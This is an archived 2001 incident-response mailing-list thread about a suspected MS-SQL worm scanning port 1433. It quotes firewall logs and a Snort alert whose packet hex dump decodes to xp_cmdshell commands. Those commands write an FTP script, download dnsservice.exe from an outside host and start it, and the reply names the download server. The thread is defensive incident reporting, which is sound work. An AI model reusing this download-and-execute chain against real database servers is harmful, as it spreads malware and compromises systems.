Re: MS-SQL Worm?

From: jabba (jabbaat_private)
Date: Tue Nov 20 2001 - 09:24:30 PST
Next message: Josh Lutz: "Fragmentation Concerns..."
Previous message: Arthur Donkers: "Re: MS-SQL Worm?"
In reply to: Douglas P. Brown: "MS-SQL Worm?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Hmm...
Looks like a worm that exploiting mssql, downloading himself from
philamuseum.netreach.net/pub/tmp/dnsservice.exe via anonymous ftp access and
starts...

JaBBa.


----- Original Message -----
From: "Douglas P. Brown" <dugbrownat_private>
To: <incidentsat_private>; <unisogat_private>
Cc: "ITS Security" <securityat_private>
Sent: Tuesday, November 20, 2001 5:54 PM
Subject: MS-SQL Worm?


>
> We saw a scan come in looking for systems answering on 1433, and
> immediately saw several systems start scanning out for other systems
> answering on 1433 - worm behavior?  Has anyone else seen this?
>
> thanks,
> -Doug
> --
> Douglas P. Brown
> University of North Carolina
> Manager of Security Resources
> 105 Abernethy Hall
>
>
> Nov 20 09:38:19 x.x.92.228:2884 -> x.x.90.70:1433 SYN ******S*
> Nov 20 09:38:19 x.x.92.228:2886 -> x.x.92.70:1433 SYN ******S*
> Nov 20 09:38:20 x.x.202.182:2503 -> x.x.73.109:1433 SYN ******S*
> Nov 20 09:38:20 x.x.202.182:2507 -> x.x.77.109:1433 SYN ******S*
> Nov 20 09:38:20 x.x.202.182:2506 -> x.x.76.109:1433 SYN ******S*
> Nov 20 09:38:20 x.x.202.182:2528 -> x.x.96.109:1433 SYN ******S*
> Nov 20 09:38:21 x.x.92.228:2904 -> x.x.110.70:1433 SYN ******S*
> Nov 20 09:38:21 x.x.92.228:2905 -> x.x.111.70:1433 SYN ******S*
> Nov 20 09:38:21 x.x.92.228:2906 -> x.x.112.70:1433 SYN ******S*
> Nov 20 09:38:21 x.x.92.228:2907 -> x.x.113.70:1433 SYN ******S*
> Nov 20 09:38:21 x.x.92.228:2909 -> x.x.115.70:1433 SYN ******S*
> Nov 20 09:38:21 x.x.92.228:2908 -> x.x.114.70:1433 SYN ******S*
> Nov 20 09:38:21 x.x.92.228:2910 -> x.x.116.70:1433 SYN ******S*
> Nov 20 09:38:22 x.x.92.228:2911 -> x.x.117.70:1433 SYN ******S*
> Nov 20 09:38:22 x.x.92.228:2913 -> x.x.119.70:1433 SYN ******S*
> Nov 20 09:38:22 x.x.92.228:2912 -> x.x.118.70:1433 SYN ******S*
> Nov 20 09:38:22 x.x.92.228:2915 -> x.x.121.70:1433 SYN ******S*
> Nov 20 09:38:22 x.x.92.228:2914 -> x.x.120.70:1433 SYN ******S*
> Nov 20 09:38:22 x.x.92.228:2916 -> x.x.122.70:1433 SYN ******S*
> Nov 20 09:38:22 x.x.92.228:2917 -> x.x.123.70:1433 SYN ******S*
> Nov 20 09:38:21 x.x.202.182:2532 -> x.x.99.109:1433 SYN ******S*
> Nov 20 09:38:21 x.x.202.182:2533 -> x.x.100.109:1433 SYN ******S*
> Nov 20 09:38:21 x.x.202.182:2535 -> x.x.102.109:1433 SYN ******S*
> Nov 20 09:38:21 x.x.202.182:2538 -> x.x.105.109:1433 SYN ******S*
> Nov 20 09:38:21 x.x.202.182:2539 -> x.x.106.109:1433 SYN ******S*
>
> [**] MS-SQL xp_cmdshell - program execution [**]
> 11/20-08:01:48.923210 x.x.92.228:3348 -> x.x.200.115:1433
> TCP TTL:127 TOS:0x0 ID:45385 IpLen:20 DgmLen:972 DF
> ***AP*** Seq: 0x318F3D1  Ack: 0x1E5807AD  Win: 0x2098  TcpLen: 20
> 03 01 03 A4 00 00 01 00 0A 00 73 00 70 00 5F 00  ..........s.p._.
> 70 00 72 00 65 00 70 00 61 00 72 00 65 00 00 00  p.r.e.p.a.r.e...
> 00 01 26 04 00 00 00 63 00 00 00 00 FF FF FF FF  ..&....c........
> 00 00 63 62 03 00 00 62 03 00 00 65 00 78 00 65  ..cb...b...e.x.e
> 00 63 00 20 00 78 00 70 00 5F 00 63 00 6D 00 64  .c. .x.p._.c.m.d
> 00 73 00 68 00 65 00 6C 00 6C 00 20 00 27 00 65  .s.h.e.l.l. .'.e
> 00 63 00 68 00 6F 00 20 00 66 00 74 00 70 00 3E  .c.h.o. .f.t.p.>
> 00 20 00 66 00 74 00 70 00 2E 00 78 00 27 00 0A  . .f.t.p...x.'..
> 00 65 00 78 00 65 00 63 00 20 00 78 00 70 00 5F  .e.x.e.c. .x.p._
> 00 63 00 6D 00 64 00 73 00 68 00 65 00 6C 00 6C  .c.m.d.s.h.e.l.l
> 00 20 00 27 00 65 00 63 00 68 00 6F 00 20 00 66  . .'.e.c.h.o. .f
> 00 6F 00 6F 00 2E 00 63 00 6F 00 6D 00 3E 00 3E  .o.o...c.o.m.>.>
> 00 20 00 66 00 74 00 70 00 2E 00 78 00 27 00 0A  . .f.t.p...x.'..
> 00 65 00 78 00 65 00 63 00 20 00 78 00 70 00 5F  .e.x.e.c. .x.p._
> 00 63 00 6D 00 64 00 73 00 68 00 65 00 6C 00 6C  .c.m.d.s.h.e.l.l
> 00 20 00 27 00 65 00 63 00 68 00 6F 00 20 00 62  . .'.e.c.h.o. .b
> 00 69 00 6E 00 3E 00 3E 00 20 00 66 00 74 00 70  .i.n.>.>. .f.t.p
> 00 2E 00 78 00 27 00 0A 00 65 00 78 00 65 00 63  ...x.'...e.x.e.c
> 00 20 00 78 00 70 00 5F 00 63 00 6D 00 64 00 73  . .x.p._.c.m.d.s
> 00 68 00 65 00 6C 00 6C 00 20 00 27 00 65 00 63  .h.e.l.l. .'.e.c
> 00 68 00 6F 00 20 00 63 00 64 00 20 00 70 00 75  .h.o. .c.d. .p.u
> 00 62 00 3E 00 3E 00 20 00 66 00 74 00 70 00 2E  .b.>.>. .f.t.p..
> 00 78 00 27 00 0A 00 65 00 78 00 65 00 63 00 20  .x.'...e.x.e.c.
> 00 78 00 70 00 5F 00 63 00 6D 00 64 00 73 00 68  .x.p._.c.m.d.s.h
> 00 65 00 6C 00 6C 00 20 00 27 00 65 00 63 00 68  .e.l.l. .'.e.c.h
> 00 6F 00 20 00 63 00 64 00 20 00 74 00 6D 00 70  .o. .c.d. .t.m.p
> 00 3E 00 3E 00 20 00 66 00 74 00 70 00 2E 00 78  .>.>. .f.t.p...x
> 00 27 00 0A 00 65 00 78 00 65 00 63 00 20 00 78  .'...e.x.e.c. .x
> 00 70 00 5F 00 63 00 6D 00 64 00 73 00 68 00 65  .p._.c.m.d.s.h.e
> 00 6C 00 6C 00 20 00 27 00 65 00 63 00 68 00 6F  .l.l. .'.e.c.h.o
> 00 20 00 67 00 65 00 74 00 20 00 64 00 6E 00 73  . .g.e.t. .d.n.s
> 00 73 00 65 00 72 00 76 00 69 00 63 00 65 00 2E  .s.e.r.v.i.c.e..
> 00 65 00 78 00 65 00 3E 00 3E 00 20 00 66 00 74  .e.x.e.>.>. .f.t
> 00 70 00 2E 00 78 00 27 00 0A 00 65 00 78 00 65  .p...x.'...e.x.e
> 00 63 00 20 00 78 00 70 00 5F 00 63 00 6D 00 64  .c. .x.p._.c.m.d
> 00 73 00 68 00 65 00 6C 00 6C 00 20 00 27 00 65  .s.h.e.l.l. .'.e
> 00 63 00 68 00 6F 00 20 00 63 00 6C 00 6F 00 73  .c.h.o. .c.l.o.s
> 00 65 00 20 00 3E 00 3E 00 20 00 66 00 74 00 70  .e. .>.>. .f.t.p
> 00 2E 00 78 00 27 00 0A 00 65 00 78 00 65 00 63  ...x.'...e.x.e.c
> 00 20 00 78 00 70 00 5F 00 63 00 6D 00 64 00 73  . .x.p._.c.m.d.s
> 00 68 00 65 00 6C 00 6C 00 20 00 27 00 65 00 63  .h.e.l.l. .'.e.c
> 00 68 00 6F 00 20 00 71 00 75 00 69 00 74 00 20  .h.o. .q.u.i.t.
> 00 3E 00 3E 00 20 00 66 00 74 00 70 00 2E 00 78  .>.>. .f.t.p...x
> 00 27 00 0A 00 65 00 78 00 65 00 63 00 20 00 78  .'...e.x.e.c. .x
> 00 70 00 5F 00 63 00 6D 00 64 00 73 00 68 00 65  .p._.c.m.d.s.h.e
> 00 6C 00 6C 00 20 00 27 00 66 00 74 00 70 00 20  .l.l. .'.f.t.p.
> 00 2D 00 73 00 3A 00 66 00 74 00 70 00 2E 00 78  .-.s.:.f.t.p...x
> 00 20 00 32 00 30 00 37 00 2E 00 32 00 39 00 2E  . .2.0.7...2.9..
> 00 31 00 39 00 32 00 2E 00 31 00 36 00 30 00 27  .1.9.2...1.6.0.'
> 00 0A 00 65 00 78 00 65 00 63 00 20 00 78 00 70  ...e.x.e.c. .x.p
> 00 5F 00 63 00 6D 00 64 00 73 00 68 00 65 00 6C  ._.c.m.d.s.h.e.l
> 00 6C 00 20 00 27 00 64 00 65 00 6C 00 20 00 66  .l. .'.d.e.l. .f
> 00 74 00 70 00 2E 00 78 00 27 00 0A 00 65 00 78  .t.p...x.'...e.x
> 00 65 00 63 00 20 00 78 00 70 00 5F 00 63 00 6D  .e.c. .x.p._.c.m
> 00 64 00 73 00 68 00 65 00 6C 00 6C 00 20 00 27  .d.s.h.e.l.l. .'
> 00 73 00 74 00 61 00 72 00 74 00 20 00 64 00 6E  .s.t.a.r.t. .d.n
> 00 73 00 73 00 65 00 72 00 76 00 69 00 63 00 65  .s.s.e.r.v.i.c.e
> 00 2E 00 65 00 78 00 65 00 27 00 0A 00 00 00 38  ...e.x.e.'.....8
> 01 00 00 00                                      ....
>
> --------------------------------------------------------------------------
--
> This list is provided by the SecurityFocus ARIS analyzer service.
> For more information on this free incident handling, management
> and tracking system please see: http://aris.securityfocus.com
>
>
>


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com
Next message: Josh Lutz: "Fragmentation Concerns..."
Previous message: Arthur Donkers: "Re: MS-SQL Worm?"
In reply to: Douglas P. Brown: "MS-SQL Worm?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
This archive was generated by hypermail 2b30 : Tue Nov 20 2001 - 11:29:17 PST